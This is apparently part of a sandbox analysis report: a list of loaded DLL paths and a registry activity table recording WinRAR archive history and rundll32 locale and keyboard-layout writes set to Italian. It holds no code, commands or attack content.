c:\windows\assembly\gac_32\presentationcore\3.0.0.0__31bf3856ad364e35\presentationcore.dll
c:\windows\assembly\gac_msil\presentationcffrasterizer\3.0.0.0__31bf3856ad364e35\presentationcffrasterizer.dll
c:\windows\assembly\gac_msil\presentationframework\3.0.0.0__31bf3856ad364e35\presentationframework.dll
c:\windows\assembly\gac_msil\presentationui\3.0.0.0__31bf3856ad364e35\presentationui.dll
c:\windows\assembly\gac_32\system.printing\3.0.0.0__31bf3856ad364e35\system.printing.dll
c:\windows\assembly\gac_msil\reachframework\3.0.0.0__31bf3856ad364e35\reachframework.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\windowsbase\cf293040f3a93afa1ea782487acae816\windowsbase.ni.dll
c:\windows\system32\netutils.dll

Registry activity

Total events
2060
Read events
1253
Write events
776
Delete events
31

Modification events

PID
Process
Operation
Key
Name
Value
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
3044
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\Desktop\Documento_030645_FT_20190415_0009002_.xls.zip
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ExtrPath
0
C:\Users\admin\Desktop
2672
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
PID | Process | Operation | Key | Name | Value
2672 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409 | |
2672 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile | |
2672 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53} | |
2672 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31} | |
2672 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410 | |
2672 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | |
2672 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31} | |
2672 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410 | |
2672 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem | |
2672 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language | |
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | LocaleName | it-IT
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iCalendarType | 1
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | s1159 |
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | s2359 |
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sTimeFormat | HH:mm:ss
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iTime | 1
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iTLZero | 1
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iTimePrefix | 0
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sTime | :
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sShortDate | dd/MM/yyyy
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iDate | 1
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sDate | /
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sLongDate | dddd d MMMM yyyy
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sYearMonth | MMMM yyyy
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sCurrency |
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iCurrency | 2
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iNegCurr | 9
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iCurrDigits | 2
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sDecimal | ,
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sMonDecimalSep | ,
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sThousand | .
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sMonThousandSep | .
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sList | ;
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iDigits | 2
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iLZero | 1
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iNegNumber | 1
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sNativeDigits | 0123456789
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | NumShape | 1
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iMeasure | 0
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iFirstDayOfWeek | 0
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iFirstWeekOfYear | 2
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sGrouping | 3;0
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sMonGrouping | 3;0
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sPositiveSign |
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sNegativeSign | -
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iPaperSize | 9
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sShortTime | HH:mm
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sLanguage | ITA
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | sCountry | Italy
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International | iCountry | 39
2672 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | LanguageList | en-US
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Keyboard Layout\Preload | 2 | 00000409
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Keyboard Layout\Preload | 1 | 00000410
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53} | Enable | 0
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31} | Default | {00000000-0000-0000-0000-000000000000}
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31} | Profile | {00000000-0000-0000-0000-000000000000}
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31} | KeyboardLayout | 68158480
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language | 00000000 | 00000410
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | CLSID | {00000000-0000-0000-0000-000000000000}
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | Profile | {00000000-0000-0000-0000-000000000000}
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | KeyboardLayout | 68158480
2672 | rundll32.exe | write | HKEY_CURRENT_USER\Control Panel\International\Geo | Nation | 118
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | LanguageList | en-US
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5084 | Arabic (101)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5053 | Bulgarian (Typewriter)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5065 | Chinese (Traditional) - US Keyboard
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5031 | Czech
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5007 | Danish
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5011 | German
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5046 | Greek
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5000 | US
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5020 | Spanish
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5009 | Finnish
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5010 | French
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5083 | Hebrew
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5033 | Hungarian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5013 | Icelandic
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5015 | Italian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5061 | Japanese
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5063 | Korean
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5008 | Dutch
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5018 | Norwegian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5035 | Polish (Programmers)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5003 | Portuguese (Brazilian ABNT)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5037 | Romanian (Legacy)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5055 | Russian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5030 | Croatian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5039 | Slovak
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5029 | Albanian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5022 | Swedish
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5079 | Thai Kedmanee
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5060 | Turkish Q
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5129 | Urdu
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5058 | Ukrainian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5052 | Belarusian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5041 | Slovenian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5042 | Estonian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5043 | Latvian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5045 | Lithuanian IBM
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5151 | Tajik
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5124 | Persian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5118 | Vietnamese
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5120 | Armenian Eastern
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5117 | Azeri Latin
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5163 | Sorbian Standard (Legacy)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5109 | Macedonian (FYROM)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5191 | Setswana
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5119 | Georgian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5108 | Faeroese
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5096 | Devanagari - INSCRIPT
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5140 | Maltese 47-Key
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5138 | Norwegian with Sami
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5113 | Kazakh
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5128 | Kyrgyz Cyrillic
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5150 | Turkmen
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5116 | Tatar
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5135 | Bengali
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5101 | Punjabi
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5097 | Gujarati
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5100 | Oriya
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5102 | Tamil
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5103 | Telugu
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5098 | Kannada
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5139 | Malayalam
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5177 | Assamese - INSCRIPT
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5104 | Marathi
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5127 | Mongolian Cyrillic
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5154 | Tibetan (PRC)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5145 | United Kingdom Extended
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5161 | Khmer
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5162 | Lao
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5130 | Syriac
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5166 | Sinhala
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5169 | Nepali
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5159 | Pashto (Afghanistan)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5132 | Divehi Phonetic
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5187 | Hausa
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5189 | Yoruba
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5186 | Sesotho sa Leboa
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5148 | Bashkir
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5168 | Luxembourgish
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5170 | Greenlandic
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5188 | Igbo
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5165 | Uyghur (Legacy)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5146 | Maori
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5160 | Yakut
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5190 | Wolof
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5072 | Chinese (Simplified) - US Keyboard
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5024 | Swiss German
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5025 | United Kingdom
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5017 | Latin American
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5002 | Belgian French
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5001 | Belgian (Period)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5019 | Portuguese
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5038 | Serbian (Latin)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5115 | Azeri Cyrillic
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5144 | Swedish with Sami
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5114 | Uzbek Cyrillic
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5158 | Mongolian (Mongolian Script)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5156 | Inuktitut - Latin
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5192 | Chinese (Traditional, Hong Kong S.A.R.) - US Keyboard
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5005 | Canadian French (Legacy)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5057 | Serbian (Cyrillic)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5193 | Chinese (Simplified, Singapore) - US Keyboard
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5004 | Canadian French
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5023 | Swiss French
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5194 | Chinese (Traditional, Macao S.A.R.) - US Keyboard
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5014 | Irish
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5155 | Bosnian (Cyrillic)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5085 | Arabic (102)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5054 | Bulgarian (Latin)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5032 | Czech (QWERTY)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5012 | German (IBM)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5048 | Greek (220)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5092 | United States-Dvorak
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5021 | Spanish Variation
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5034 | Hungarian 101-key
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5016 | Italian (142)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5036 | Polish (214)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5126 | Portuguese (Brazilian ABNT2)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5175 | Romanian (Standard)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5056 | Russian (Typewriter)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5040 | Slovak (QWERTY)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5080 | Thai Pattachote
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5059 | Turkish F
